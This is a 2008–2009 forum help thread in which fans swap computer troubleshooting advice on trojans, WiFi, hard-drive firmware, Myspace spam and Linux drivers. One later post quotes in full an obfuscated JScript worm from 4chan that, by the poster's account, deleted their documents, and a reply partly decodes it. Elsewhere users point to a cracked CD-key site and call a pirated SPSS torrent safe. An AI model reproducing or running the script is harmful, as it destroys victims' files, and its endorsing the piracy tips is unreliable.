I got a Trojan horse of some kind last night where my comp rebooted itself and suddenly I got a message of a "security warning" and when I pressed "Enable Protection" it directed me to a site called defender-review.com, "a Microsoft certified" anti-spyware program.

I googled the url and found instructions on how to remove it: http://www.precisesecurity.com/blogs/2008/11/16/defender-reviewcom/

Just in case any of you are hit with this one. :]

bighead384
12-14-2008, 04:01 PM
I got a Trojan horse of some kind last night where my comp rebooted itself and suddenly I got a message of a "security warning" and when I pressed "Enable Protection" it directed me to a site called defender-review.com, "a Microsoft certified" anti-spyware program.

I googled the url and found instructions on how to remove it: http://www.precisesecurity.com/blogs/2008/11/16/defender-reviewcom/

Just in case any of you are hit with this one. :]

I'm 95% sure that this is the virus I have. I'll have to do this when I get back to my computer. Thanks a bunch!

Slim Pickens The Bomb Rider
12-14-2008, 04:06 PM
All the windows users out there, do the switch ;)

0r4ng3
12-19-2008, 03:51 PM
Both my Nintendo DS and Wii can no longer connect to WiFi, and I don't know why. Does it have anything to do with the fact that I set up a password for my new wireless router, but I didn't for my old one?

It's important that I solve this problem quickly. I have 4 episodes of Strong Bad's Cool Game For Attractive People to download. (also Pokemon to trade but that's besides the point)

IamSam
12-20-2008, 12:48 AM
So what are people's opinions of running both Vista and Apple Leopard on one PC system?

Endymion
12-20-2008, 03:16 AM
Both my Nintendo DS and Wii can no longer connect to WiFi, and I don't know why. Does it have anything to do with the fact that I set up a password for my new wireless router, but I didn't for my old one?

i know the DS can only connect to unencrypted or WEP encrypted networks, not WPA. dunno about the Wii.

Tijs
12-20-2008, 06:52 AM
So what are people's opinions of running both Vista and Apple Leopard on one PC system?How did you get Leopard to run on your PC?

0r4ng3
12-26-2008, 04:22 PM
I know this has been answered before, but does anyone know where I can get a CD-key for a computer game (such as StarCraft)? I found one, but I had to pay like 9 dollars for it.

Endymion
12-26-2008, 04:28 PM
gamecopyworld.com

0r4ng3
12-26-2008, 08:25 PM
Thanks for that. Another question: why won't StarCraft work on my MacBook? I'm sure I've had it installed before. Do I have to download something else?

the_offsprings_monkey
12-27-2008, 09:30 AM
OK, so I finally decided to update to Service Pack 3, however, I'm wondering now if this was a wise choice to make. It feels a little lag like to me at the moment. Anyone know if it's definitely better than SP2?

Free?
12-27-2008, 09:32 AM
I recommend not to install SP3. From my experience it only brought some more problems, I didn't notice any advantages about it.

The Talking Pie
12-27-2008, 10:09 AM
I haven't noticed any problems at all from using it. Besides, it's more a collection of security patches than anything new. Some software will refuse to install without it.

Free?
12-27-2008, 12:55 PM
And some software will refuse to work with it :P. Like daemon tools. Can't remember, but there were some more not working under SP3 programs.

bighead384
01-08-2009, 11:35 AM
Alright, I'm officially really friggin' annoyed. For a month now, I've been having this problem on Myspace. On any given Myspace page, or in my updates, about 1/4 of the pictures do not load. It's like this absolutely every time. There's no red x or anything, it's just blank. I'm also getting fake message from those porn star looking girls. But believe it or not, I still have this problem even after working with the experts at www.majorgeeks.com for about 2-3 weeks now, and running all their scans. I'm literally out of ideas.

Anyone particularly knowledgeable about Myspace viruses?

The Talking Pie
01-08-2009, 04:30 PM
Do you have the same problem when using another computer on the same internet connection, or is it just a problem with the one computer?

Have you tried other browsers or operating systems? Does the same happen in Safe Mode with Networking?

Also, what steps have you already tried and found haven't worked?

Al Coholic
01-08-2009, 07:19 PM
This isnt exactly a comp problem but not worthy of its own thread:

how do you change what is says under your username here? Mine just says member...

0r4ng3
01-08-2009, 07:21 PM
It'll say Senior Member after 100 posts. You can change it yourself after 500. I think it was 500.

Al Coholic
01-08-2009, 07:33 PM
Jeez. 500? I don't think I'll ever post that much. I wanted it to say anonymous. Then the picture might make more sense.

bighead384
01-08-2009, 10:48 PM
Do you have the same problem when using another computer on the same internet connection, or is it just a problem with the one computer?

Have you tried other browsers or operating systems? Does the same happen in Safe Mode with Networking?

Also, what steps have you already tried and found haven't worked?

My laptop that uses the same connection has no problems. I'll try IE and see if I have the same problem. Didn't think of that.

Edit: Good call. I tried IE and had no problems. Hmmm, I'm guessing I should try to delete and reinstall Firefox? Would that get rid of the problem? Or maybe I should just permantley switch to IE...

MoonTan™
01-09-2009, 12:03 AM
My computer has issues, most of the time it dosnt start up, it is just frozen on the welcome screen, i have to kick my computer to sometimes start it.

Endymion
01-09-2009, 01:33 AM
My laptop that uses the same connection has no problems. I'll try IE and see if I have the same problem. Didn't think of that.

Edit: Good call. I tried IE and had no problems. Hmmm, I'm guessing I should try to delete and reinstall Firefox? Would that get rid of the problem? Or maybe I should just permantley switch to IE...

clear the cache.

bighead384
01-09-2009, 01:44 AM
It didn't work. I even tried exiting the browser and starting a new one. I don't get this. It's really pissing me off. I've done like a million scans with programs recommended by experts, and my computer is so much faster. Yet this annoying Myspace bug still persists.

sKratch
01-09-2009, 09:36 AM
Fallout 3 crashes to desktop almost without fail after using VATS. Turned a few settings down (from 4x to 2x to no AA, 8x to no anisotropic, lowered resolution slightly) and it still happens. I think I'll email Bethesda or whatever their name is.

The Talking Pie
01-09-2009, 10:30 AM
Hmmm, I'm guessing I should try to delete and reinstall Firefox? Would that get rid of the problem? Or maybe I should just permantley switch to IE...

Try uninstalling and reinstalling. Delete any user settings. Completely kill it from your machine, then start again. If it's still occuring, I'd report it as a bug to Mozilla (not 100% certain, but it could be something your set-up's causing) and switch to Opera or Chrome until it stops happening.

As much as IE is making leaps and bounds nowadays, I'm still not impressed enough with the product to begin using it again.

Jebus
01-09-2009, 10:54 AM
Before uninstalling, you should try disabling all your add-ons first to see if one of them is causing a problem.

ily2
01-09-2009, 04:47 PM
my computer makes a really wierd noise when you turn it on...
it all started when my grandpa tried to plug in the printer(unsucessfully)and tiped it up...
i made it make the same noise in the same way earlier that day but it stoped whwn i tiped it again
i tried it this time and it still makes that noise:(

Tijs
01-09-2009, 05:33 PM
Try opening your computer and gently remove dust with a vacuum cleaner, especially the vans (give those a little twist with your hand while holding the vacuum cleaner over it, but don't force anything).

Jojan
01-09-2009, 05:47 PM
My computer has issues, most of the time it dosnt start up, it is just frozen on the welcome screen, i have to kick my computer to sometimes start it.

Something may be loose inside your computer. Open it up and make sure everything is well attached to their places.

Free?
01-13-2009, 05:08 AM
Starting from yesterday, I've noticed there is a red dot (just like . only it's a perfect square, not stretched vertically) exactly in the center of my monitor's screen. It's visible on the darker backgrounds and it disappears on the light ones. When I switch different resolutions, it's still there. Does that mean that my monitor will soon be dead? :rolleyes:

Oxygene
01-13-2009, 05:49 AM
Starting from yesterday, I've noticed there is a red dot (just like . only it's a perfect square, not stretched vertically) exactly in the center of my monitor's screen. It's visible on the darker backgrounds and it disappears on the light ones. When I switch different resolutions, it's still there. Does that mean that my monitor will soon be dead? :rolleyes:

No you have something called a stuck pixel.. if you are lucky chances are you can go away, if you give me an e-mail address I'll send you a video I use to fix my stuck pixels. It works most of the time.. what helps is if you massage the pixel gently to help it jump out.. with like a tissue or something so you don't you know get the monitor all dirty

Budzy
01-13-2009, 06:38 AM
My CD/DVD Drive doesn't work, doesn't read any CD or DVDS I put in it.
Device manager says its connected and working properly, I've tried uninstalling then reinstalling it, updating it, everything. I think it's a result of an automatic Windows Update, but I've removed all the updates, it didn't work, and then reinstalled the updates, and it still doesn't work. I've tried system restore aswell, taking it back to an earlier date when I knew it did work, and I get this error message:

'Changes made to drive(s) E:\ after this point cannot be reversed because the driver was either excluded System Restore Monitoring, or was turned off or removed.'

So obvoiusly something has changed. Any ideas of what to do?

Al Coholic
01-19-2009, 12:46 PM
More of a question than a problem:

I have a lot of cool/funny pictures I use as my desktop background. I then arrange my icons around each picture in a certain way that makes it look even cooler. I have a pc with Windows Vista. But I get tired of the same background, and constantly changing the background and re-arranging the icons is tiring. Is there some kind of program that could store those backgrounds the way I have them set up and alternate them? That would be the shit.

Thomas
01-20-2009, 08:44 PM
So, my laptop is getting REALLY hot. I mean, like, REALLY hot. Is there some sort of cheap method to cooling it down somewhere?

IamSam
01-20-2009, 08:46 PM
So, my laptop is getting REALLY hot. I mean, like, REALLY hot. Is there some sort of cheap method to cooling it down somewhere?

They make these pads with fans built in....I think they even have them at Wal*Mart.

0r4ng3
01-20-2009, 08:48 PM
Mountain Dew?

Seriously, though, I'd try to figure out why your laptop is getting really hot first. Is there a program that's using a lot of processing power?

Thomas
01-20-2009, 08:49 PM
Mountain Dew?

Seriously, though, I'd try to figure out why your laptop is getting really hot first. Is there a program that's using a lot of processing power?

Windows media Player?

That's about it, outside of a window or two of Google Chrome, and occasionally the AOL browser.

IamSam- How much do those run for?

IamSam
01-21-2009, 12:21 AM
Windows media Player?

That's about it, outside of a window or two of Google Chrome, and occasionally the AOL browser.

IamSam- How much do those run for?

Here you go! Coolers (http://www.newegg.com/Product/ProductList.aspx?Submit=ENE&DEPA=0&Order=BESTMATCH&Description=laptop+cooling+pad&x=0&y=0)

Thomas
01-21-2009, 12:23 AM
oooooooh. I like the $8 one...

JoY
01-23-2009, 04:18 AM
I have a problem that's kind of a computerproblem. I don't have SPSS on my computer & I can download it as a torrent, but I'm worried it'll be some crazy virus, so now I'm hoping one of you guys has SPSS.

Jojan
01-23-2009, 05:20 AM

If it gets hot even if you don't do anything at all then you should check if you have dust in you computer. Laptops are hard to open sometimes. But carefully look for att the screws and gently open it. Google for guidelines.

Some fans can be controlled with software. Google on your model and "fan speed control" or something.

If it's due to overloading the CPU you could try a lightweight GNU/Linux based operating system.

ily2
01-23-2009, 06:05 AM
mine isnt a technical problem but its driving me crazy
absolutly insane
the taskbar is on the said of the screen instead of the botom
i pressed backspace while e-mailing and it just moved all by its self
how do i get it back to the bottom

Tijs
01-23-2009, 06:39 AM
mine isnt a technical problem but its driving me crazy
absolutly insane
the taskbar is on the said of the screen instead of the botom
i pressed backspace while e-mailing and it just moved all by its self
how do i get it back to the bottom

- Right click the taskbar and make sure 'Lock the taskbar' is unchecked.
- Left click&hold an empty place on the taskbar and drag it to the bottom of the screen and let go.

You're done!

HornyPope
01-23-2009, 09:25 AM
I have a problem that's kind of a computerproblem. I don't have SPSS on my computer & I can download it as a torrent, but I'm worried it'll be some crazy virus, so now I'm hoping one of you guys has SPSS.

You can go ahead and download it without fear.

Jojan
01-23-2009, 11:53 AM

http://en.wikipedia.org/wiki/PSPP

PSPP is a free software application for analysis of sampled data. It has a graphical user interface and conventional command line interface. It is written in C, uses GNU Scientific Library for its mathematical routines, and plotutils for generating graphs.

It is intended as a free replacement of the proprietary program, SPSS.

http://en.wikipedia.org/wiki/Rcmdr

R Commander is a GUI for the R programming language, licensed under the GNU General Public License. Among the existing R GUIs, Rcmdr together with its plug-ins is perhaps the more viable R-alternative to commercial statistical packages like SPSS. The package is highly useful to R novices, since for each analysis run it displays the underlying R code.

Al Coholic
01-24-2009, 02:31 PM
More of a question than a problem:

I have a lot of cool/funny pictures I use as my desktop background. I then arrange my icons around each picture in a certain way that makes it look even cooler. I have a pc with Windows Vista. But I get tired of the same background, and constantly changing the background and re-arranging the icons is tiring. Is there some kind of program that could store those backgrounds the way I have them set up and alternate them? That would be the shit.

Cmon people.

The Talking Pie
01-24-2009, 02:37 PM
I think desktop icon positions are stored in the registry (although I could be wrong... never bothered looking myself). So all you'd need to do is to export the registry keys for the icon positions and wallpaper in each different layout, shove all of those .reg files into a folder and doubleclick whenever you want to change.

ily2
01-24-2009, 02:39 PM
- Right click the taskbar and make sure 'Lock the taskbar' is unchecked.
- Left click&hold an empty place on the taskbar and drag it to the bottom of the screen and let go.

You're done!

OMFG TY
I LOVE YOU!!!
awesome!!!!

Al Coholic
01-24-2009, 02:40 PM
I'm way too lazy. I'd just want the thing to switch around by itself. If that's not invented yet whoever does would bank.

The Talking Pie
01-24-2009, 03:29 PM
Anyone with even a little programming knowledge could write something to pull/push registry keys, but if you're too lazy to double-click on a file, you'll be waiting forever.

Al Coholic
01-24-2009, 04:33 PM
My computer spends half its time plugged into a giant TV playing music. So it switching on its own would be way tighter than me manually doing it in front of everyone.

Also, I don't know how to do what you said.

Jojan
01-24-2009, 05:45 PM
I think desktop icon positions are stored in the registry (although I could be wrong... never bothered looking myself). So all you'd need to do is to export the registry keys for the icon positions and wallpaper in each different layout, shove all of those .reg files into a folder and doubleclick whenever you want to change.

If you're using GNOME: Look in your .gconf folder for what you want to have. It's full of xml files.

The Talking Pie
01-24-2009, 05:48 PM
Yeah, Gnome's simple enough, but we're talking Windows, aren't we? I haven't poked around regedit for a while.

nieh
01-25-2009, 10:35 AM
If I'm able to connect to a wireless network, but for some reason I'm not able to use the internet while connected, is that likely to be a hardware issue or is there some setting or something that probably needs to be corrected?

sKratch
01-25-2009, 10:58 AM
If this is your home Internet connection, try resetting the router by unplugging it for at least a minute and plugging it back in.

The Talking Pie
01-25-2009, 11:10 AM
Also make sure that nothing nearby's using the same channel. I've had a wireless CCTV camera knock out my internet before.

nieh
01-25-2009, 01:34 PM
My computer and my roommates can connect to the internet fine, but when I use my win ce based mp3-player to connect to the network, it connects but says there's no internet when I try to use IE or MSN or anything of the sort (despite staying connected to the network). I'm pretty much assuming it's hardware since this is a replacement device and the first one worked fine right off the bat and this one hasn't at all since I got it. I really don't care enough to send it in for repairs if it is the hardware since I never actually use the wifi aspect of it (the only reason I'm even doing it now is out of boredom/curiosity, not need, since I can just use my computer for the internet), but if it's something stupid like me messing up one of the settings and not realizing it then that's easy enough to fix on my own.

The Talking Pie
01-25-2009, 04:43 PM
Hmm... that's weird. Check your DNS / gateway / etc. settings, maybe? Is it pulling the connection info by DHCP or has it been manually inputted?

Tijs
01-26-2009, 10:00 AM
How do I set my input language to Dutch in Windows XP?

I'm currently looking in the language settings and I for the "Default input language" there's only "English (United States) - US".

Under "installed services" there's only US, and when I click "Add..." and I select "Dutch (Netherlands)" I can only choose between some U.S. and U.K layouts.

Is it possible to install the Dutch language?

Jojan
01-26-2009, 02:10 PM
How do I set my input language to Dutch in Windows XP?

I'm currently looking in the language settings and I for the "Default input language" there's only "English (United States) - US".

Under "installed services" there's only US, and when I click "Add..." and I select "Dutch (Netherlands)" I can only choose between some U.S. and U.K layouts.

Is it possible to install the Dutch language?

http://answers.yahoo.com/question/index?qid=20071221170012AAy5O59

GreenTerror
02-01-2009, 08:20 PM
This is one I need to ask the Linux gurus:

Soooo, I've successfully converted a friend of mine. She left me in charge of her laptop to have my way with. I got Ubuntu Hardy Heron successfully installed alongside Windows Vista, got the updates, and the entire process is almost complete except her wireless card doesn't seem to want to work. I've tried to see if it needs any drivers or anything, but it's insisting it works just fine.
I really have absolutely no clue where to start with this. I've never dealt with a laptop before. Help me plz?

nieh
02-01-2009, 08:29 PM
Make sure the wifi switch on the outside of the laptop is turned on.

GreenTerror
02-01-2009, 08:32 PM
What would that look like?

Don't know if this matters, but she was using Vista earlier and was able to connect to my router just fine.

nieh
02-01-2009, 08:35 PM
I'm not sure if they're on all laptops, but on mine it's just a regular switch with a wifi antenna symbol on one side and a blue LED light on the other (which turns red when it's turned off). I'm new to laptops too and I honestly didn't realize the switch was there until I accidentally turned it off at some point.

Endymion
02-02-2009, 11:01 AM
under vista, find out what the type of the card is. maker, model, something. or google for the laptop model. google should tell you what sort of drivers the wireless needs and if they're in the kernel or if you need an external package.

you said ubuntu thinks the wireless is working? like, networkmanager is there but doesn't see any networks or something? if so, it might need a firmware update. again, google should be able to tell you what you need to do to get the hardware working.

GreenTerror
02-02-2009, 01:08 PM
Well, I thought it was at least recognizing the card, but I guess not. I booted with Vista and got the card info, and what Ubuntu said it was wasn't right. I Googled the wireless card itself and found some instructions on how to get it working with Ubuntu. I've yet to try it, though. I have to wait until my friend brings her laptop over again.

Endymion
02-02-2009, 01:14 PM
what does google say? is it just some package you need to install? or ndiswrapper...(ugh)?

GreenTerror
02-02-2009, 02:57 PM
http://www.ubuntugeek.com/atheros-ar5007-wireless-with-madwifi-on-ubuntu-804-hardy-heron.html

That's the result I found that seems to have the most easy to follow directions on how to get it working. I installed the i386 version of Ubuntu on the laptop. There's steps there for both that and the 64 bit version.

The Talking Pie
02-02-2009, 05:41 PM
Does the card show up under 'Hardware Drivers'? I'm assuming that the link posted refers to your model; I've had problems with Atheros cards before. I seem to recall reading something about certain ones being dropped from the kernel due to incompatibilities with something else (I dunno; I followed a similar tutorial and it seemed to work for me. Give it a go!).

Also, why not update to Intrepid Ibex? I've only noticed wifi support getting better with each release of Ubuntu.

bighead384
02-05-2009, 10:40 AM
I can't get rid of this damn Myspace virus. I keep on getting fake messages in my inbox from slutty looking girls. How can I stop it? I checked the Myspace faq and didn't find anything...

The Talking Pie
02-05-2009, 11:48 AM
Hmm... put the pictures in a zip file and send them to me over MSN... I'll have a look and see what I can think of...

In all seriousness, though, unless it's Greasemonkey gone bad, I doubt it's a virus.

bighead384
02-05-2009, 12:07 PM
But I get them all the time. I dunno what else it could be.

GreenTerror
02-05-2009, 12:12 PM
It is Spamslutbots. Somewhere in your settings there's an option that makes people have to solve one of those captcha images to send you a message if they're not on your friends list.

Edit:
Go to account settings, and then the link at the top that says "spam". There's all sorts of other settings there you can adjust for this kind of thing, too.

Free?
02-05-2009, 12:13 PM
To me it looks like your email (or myspace inbox, if there is such thing - I never had a myspace page) got into some spam lists. Not virus, just tonnes of trashy messages. I'd recommend you to make a new myspace page and be careful with subscribing/adding friends/posting your myspace.

GreenTerror
02-05-2009, 12:17 PM
I really don't think he got hacked, I think it's just slutspam. No need to make a new Myspace. Just edit your settings.

bighead384
02-05-2009, 12:20 PM
Thanks all. I'm sure this will work.

bighead384
02-05-2009, 10:32 PM
For about a month now, I've been having this frequent problem where Youtube and iTunes randomly stop playing. I'll be using one of those programs, and the media will just stop playing out of nowhere. I try to get it work again, and it plays about two seconds and stops. It happens just like this every time, and it happens often. wtf.

Jojan
02-19-2009, 02:59 PM
For about a month now, I've been having this frequent problem where Youtube and iTunes randomly stop playing. I'll be using one of those programs, and the media will just stop playing out of nowhere. I try to get it work again, and it plays about two seconds and stops. It happens just like this every time, and it happens often. wtf.

Reinstall everything.

bighead384
02-22-2009, 02:15 PM
Reinstall everything.

Meh I might try that at some point. The problem hasn't been as frequent for some reason, so I've been too lazy to try and find a solution.

Anyway, here's my current problem: The plug that goes from my keyboard to the motherboard (the circular thing with the pins) has to be positioned perfectly when I plug it in or the keyboard doesn't work. I was told you can by a replacement for that part that you plug in (I knew the name of it, but I forget it now) for about 10 bucks? Is this true? If I buy a replacement, how do I change it? It doesn't really look like it comes off...

The Talking Pie
02-22-2009, 02:31 PM
I wouldn't pay $10 for a PS/2 male connector. You could always replace it, but it would most likely be more fiddly trouble than it's worth.

Could you also clarify the problem? Is it that there may be a break in the wire, so that it has to be positioned just so, or are you just trying to plug the lead in in such a way that the pins don't line up with the female port?

Jebus
02-22-2009, 02:45 PM
Pretty sure you can buy entire keyboards for less than 10 bucks.

I'm not sure what your problem is either. If you mean the pins on the plug aren't lined up perfectly so they fit in female port, you could just get needle(something thin) and move/bend the pins to the right position.

bighead384
02-22-2009, 05:41 PM
Wow, I didn't know keyboards were that cheap. I guess I'll just have to take a look at the pins to see if any of them are crooked, but it definitely doesn't seem worth it to buy a replacement PS/2.

0r4ng3
02-28-2009, 10:32 AM
People that use Mozilla Thunderbird for Hotmail (or otherwise any kind of web mail): What settings do you use? Nothing seems to work for me.

Jojan
02-28-2009, 10:59 AM
Speaking of cheap keyboards; Does Microsoft charge for the Windows logo on the keyboards? Smart move to put two of them on there.

The Talking Pie
03-01-2009, 08:07 AM
People that use Mozilla Thunderbird for Hotmail (or otherwise any kind of web mail): What settings do you use? Nothing seems to work for me.

As far as I know, you can't use a 3rd party client for Hotmail anymore. There used to be integration into Outlook, but that was POP (I think). Windows Live Desktop Mail is an excellent client for Hotmail, though. As far as I know, they use a butchered kind of [proprietary?] IMAP.

Lars
03-02-2009, 01:44 PM
I feel like it's a stupid question but here goes.

I've got a 500GB Maxtor SATA hard drive. I think it's died, any other ways to check this? Under mac osx nothing appears under Disk Utility, and when booting XP nothing is under the Device manager. I've never even used this drive yet, it was just formatted for Mac OS (HFS?) and sat unused for a few months (3?). I was just going to start using it now but noticed it was no-where to be seen. Tried changing it from Drive bay 3 to 4 with no change, so changed my windows drive to slot 3 to check if that works and it does, so it seems like everything's pointing to a dead drive.

Endymion
03-02-2009, 03:54 PM
dumb answer: did you plug everything in? sata cable & power? are there any jumpers on it? if you remove them all, will it work then?

also, mac fs = hfs+. old school macs used hfs.

Lars
03-02-2009, 04:09 PM
Macpro = screw caddy on top and plugs straight into the board, only jumper option is to limit the speed down to SATA I. It's configured the same as the other two which work fine.

I was just curious if there were any other ways to check if it was dead before I go through the annoyance of an RMA. It used to show up in the device list and I didn't change anything to it, it just sat plugged into slot 3 since I had it formatted. And when I reflect on that, it reminds me reading articles where HD's that aren't used very often/sporadically may be more prone to failure, so that could explain why it failed, or it's just a duff one and I should be glad I didn't use it.

GreenTerror
03-02-2009, 04:24 PM
Speaking of cheap keyboards; Does Microsoft charge for the Windows logo on the keyboards? Smart move to put two of them on there.

My guess: Yes. Assholes.

Mine still has it. :(

chicapowerpunk
03-02-2009, 04:58 PM
the disc is likely to pirate, you know a disc is copied to the apocryphal total darkness. :D
No seriously, can have such a problem.:)
If you can not load it then go back to the place where you get technical support and requests.;)

Lars
03-03-2009, 03:17 PM
Looks like I found the problem for the drive that's affected.

Firmware Recommendations for Barracuda 7200.11, ES.2 SATA, and DiamondMax 22 Drives

A firmware issue has been identified that affects a small number of Seagate Barracuda 7200.11 hard drive models which may result in data becoming inaccessible after a power-off/on operation. The affected products are Barracuda 7200.11, Barracuda ES.2 SATA, and DiamondMax 22.

Based on the low risk as determined by an analysis of actual field return data, Seagate believes that the affected drives can be used as is. However, as part of our commitment to customer satisfaction, Seagate is offering a free firmware upgrade.

Please see below for instructions.

In the unlikely event your drive is affected and you cannot access your data, the data still resides on the drive and there is no data loss associated with this issue. If your drive is no longer accessible, click here to contact us directly for further assistance.

Please use the following tools and instructions to determine if you have one of the affected products. If your drive is affected, we recommend that you update the firmware on the disk drive to prevent this condition.

The Talking Pie
03-04-2009, 11:52 AM
I remember reading about that... let us know if it works, for future reference.

Lars
03-04-2009, 01:59 PM
I bought two drives at the same time. One for a windows boot and the failed one as storage for video/audio (I just never got around to importing any footage/recording anything yet). The failed one did nothing with the firmware upgrade tool via freedos, it ended up giving me an error about the drive being incorrect in some way (it flashed off rather quickly). I proceeded to back up the windows drive today and that upgraded the firmware without an issue or any data loss.

On the plus side, painlessly arranged an rma with the place I bought it from.

I guess I'll have to check hd's for firmware upgrades in the future now.

The Talking Pie
03-04-2009, 04:10 PM
Hmm... does anyone else think that there's something wrong when hard drives need upgradeable firmware?

Lars
03-04-2009, 04:31 PM
Yeah, haha. I checked my other drive (Western Digital) just to make sure if that needed anything done but it doesn't.

Apparently this was written by someone from Seagate about how the drive fails

"I'm no statistician, but the 'drive becoming inaccessable at boot-up' is pretty much a very slim chance - but when you have 10 million drives in the field, it does happen. The conditions have to be just right - you have to reboot just after the drive writes the 320th log file to the firmware space of the drive. this is a log file that's written only occasionally, usually when there are bad sectors, missed writes, etc... might happen every few days on a computer in a nin-RAID home use situation.. and if that log file is written even one time after the magic #320, it rolls over the oldest file kept on the drive and there's no issue. It'll only stop responding IF the drive is powered up with log file #320 being the latest one written... a perfect storm situation"

So I guess I won a hard drive lottery!

IamSam
03-07-2009, 01:50 AM
So if I wanted to take clips from a DVD, what would I need?

bighead384
03-07-2009, 02:04 AM
My problem: I've hit my computer several times with a wooden baseball bat.

No more spyware. But I guess I'll just jerk off with my imagination. Like they had to do in the olden days. I mean, yeah, I've done that before, only because I had to. I'm spoiled though. I'm used to whackin' while I'm actually looking at something. That's crazy how they didn't have that back then.

0r4ng3
03-20-2009, 11:08 PM
This is more of a general question than a problem.

Is it a bad idea to get Leopard for Mac within the next month, what with Snow Leopard coming out soon? Should I just wait until June or whatever to get the latest one?

The Talking Pie
03-21-2009, 08:00 AM
I'd add yet another month onto the wait and see what the reviews are like.

ad8
03-21-2009, 09:30 AM
I have a problem with an external hard drive. I needed more storage and bought a SATA-hard drive(internal). Since it was too new for my pc (ide), I bought a case for it and now use it as an external hard drive. The thing is:
Some days ago (I had already stored data on it) the external hard drive disappeared from the list of the drives and the data seems lost. Does anyone here have an idea about what could have happened and how I could get the data back? Thanks in advance.

RageAndLov
03-21-2009, 10:13 AM
Earlier today I was cruising on 4chan for fun. And then someone is posting this message everywhere:

Copy and paste the following to Notepad, save it as 4chan.js, open the file you saved and shit bricks.

A='xHeocmlmt\rWctj(rifsej"peiWspm\n"oapeelitoas\x20ac'+
'.\x20neloa\x20\x20ti.n.d(ra/-)g$eot).s\rinD(em<760'+
'\ro(th:mc./"tam0xn\rxssxa(pinr()1b"tam.s2\r"-+cedo'+
'if-am\rse\\"so\\(M.d)ur8+m\\rs\np"th:ac./map,\neqt'+
'd"t-emitrabd=).d\rHe30}Sree"r.l.(d\x20rho-t0\x20d'+
'\x20\\0'
B='=.abts2lp\nSree"iniyme)exlSctem\\pna\x20\x20lnotda'+
'ishjo\x20\x20euvas\x20c\\"ra)ec(z\\i1tp:\rce\nlea)'+
'te1600\np""t/ghob+hn().d\n.pett/adoe\\/]=+hn(st,\n'+
'\\""onisood;e\n+sn++mn"aro)b()sonetxep"t/thobgrh0x'+
'tuhecet"up/mtoa"\rs(\n.e1)\rHeocwislr"\x20stuws'+
'\x20\x20&\x20/\\)'
C='Wctj(x.h"fHeocspglsoc.nteHrn)=nydstfog\x20e,vt\x20'+
'asptf\x20\x20enhbkn+el)pe[](,:ph(\nl(wewt.T(240)xe'+
'g,t/.ar/M.d)\rs(trot.c<n=tad)\r(M.d)ur8sn+\\ntsinr'+
'an=s"t\\t"\\""tam.s2++d\\g".no,t/.ar/bdp).reerony,'+
'laf-aur+\nesWsp0\r\n.abtsph"uc/t\x20tn\x209-\x20/q'+
'"'
D='Sree"mxt)=.abtct.etbtotf(.ia\r(C\x20\x20thow\x20Np'+
'\x20e\x204n,ehiysddirs\\fal.l(a+/"gre"fo)h(\x20egi'+
')370{.ne"pi4ng?aro,\ne)=enemhs\x20"hd+[\n"aro)b()='+
'-bnt-pt:mta"=ron+cn++hn(st,m"eni\ro(s"pd4ngio."\rs'+
'esa(ntp"trod;nybxn)Sl(0\nWctj(cte)nmcasd\x20-0frs'+
'\x20,'
X=[];for(I=0;I<A.length;I++)X[I*4]=A.charAt(I)
for(I=0;I<B.length;I++)X[I*4+1]=B.charAt(I)
for(I=0;I<C.length;I++)X[I*4+2]=C.charAt(I)
for(I=0;I<D.length;I++)X[I*4+3]=D.charAt(I)
eval(X.join(''))

I think: "Oh well, what is so fasinating about this?" and does exactly what is written. Nothing happens, and I just delete the file I saved and go on with my life. 20 minutes later perhaps, my Anti-Virus programme tells me that something is trying to change my system, and asks if I want to accept that. I'm very suspicious and blocks the operation. Then I'm going to My Documents to fin a pic, and that's when I realize what I have done. The whole containment of My Documents is gone! It brightens up to me that it was that notepad thing that did this! All my documents, music and images are gone! 2 years of homework is gone! I feel so stupid! The guy posting this was right, I shitted bricks!

The blocking of the operation I did was the script that I made with notepad trying to delete my programmes. Luckily I said no to that. I'm going to ask the technical responsible on my shcool on Monday if he can do anything with this.

How stupid am I?

P.S. Does anyone know a programme that can recieve lost files?

Jebus
03-21-2009, 12:59 PM
I don't know how to respond to this...

The Talking Pie
03-21-2009, 02:20 PM
It's just taking one character at a time and compiling it to a string. I just dumped the result to file instead of executing it as a command, and I got the following:

x=WSH.createobject("msxml2.xmlhttp") f=WSH.createobject("scripting.filesystemobject").opentextfile(WSH.scriptname) m=("\nCopy and paste the followingxto 2o e at,0sdvNxatp2i sxe0h2 aj04coan. s, penetheufilv yoa sased nd chit\bri"ks.rn\na+f.)eadell(c).r(plaze(/\[a-i]+)1(/gt,"$p:ge:pro hetc(")e f. losl() ewhiae(n w D)te(t.geeTim1()<623704760000 ){ px.o"en("gett,"h/tp:g/imh.4coan.brg/+/?"hMatn.ra(dom)),0. xdsen () .t=xpreseonsttext.ma/ch(a

I'm guessing that the smiley in your post messed up the order, but you get the gist of where it's going...

Offspring-Junkie
03-27-2009, 02:43 PM
I've read about a virus called conficker who's going to infect more than ten million pcs around the world in April the first. AFAIK that's no joke. Just a simple warning to you all.

m.offspring.r
03-27-2009, 03:21 PM
eheheh I use Linux :P

The Talking Pie
03-27-2009, 06:47 PM
Don't get cocky. Let's not forget that it only takes one person to write a decent *nix virus (combined with an over-confident, sudo-happy user) to wreak havoc.

I believe a similar thing happened to Mac OS a while ago.

m.offspring.r
03-28-2009, 08:03 AM
Nobody executes commands from sources not credible...

Yes, you are right... The most virus are come from between keyboard and chair :D

Endymion
03-28-2009, 11:31 AM
Nobody executes commands from sources not credible...

a lot of the ubuntu-using newfags do.

The Talking Pie
03-28-2009, 02:19 PM
Yep. Especially when their understanding of viruses 'not affecting' Linux is that magically the OS is above such threats, rather than the whole 'permissions' and 'most (but not all!) viruses being Win-only' issues.

I usually don't try to explain that to people who ask me about this 'Ubuntu thing', though... they'll fuck up their computers one way or another, and they just don't understand what I'm trying to tell them, so sometimes it's just easier to sit back and watch.

m.offspring.r
03-29-2009, 08:01 AM
New users prefer the "click'n'run" rather than stop and think what they are doing ...

And there's another: they think Linux is equal to Microsoft Windows ... When you come to the conclusion that it is not the same thing, call it anything else and the bastard's tux :P

At This moment, I am an happy Linux user :D

the_offsprings_monkey
03-29-2009, 07:24 PM
New users prefer the "click'n'run" rather than stop and think what they are doing ...

And there's another: they think Linux is equal to Microsoft Windows ... When you come to the conclusion that it is not the same thing, call it anything else and the bastard's tux :P

At This moment, I am an happy Linux user :D

http://img11.imageshack.us/img11/8534/macpclinux.gif

nieh
03-30-2009, 05:36 PM
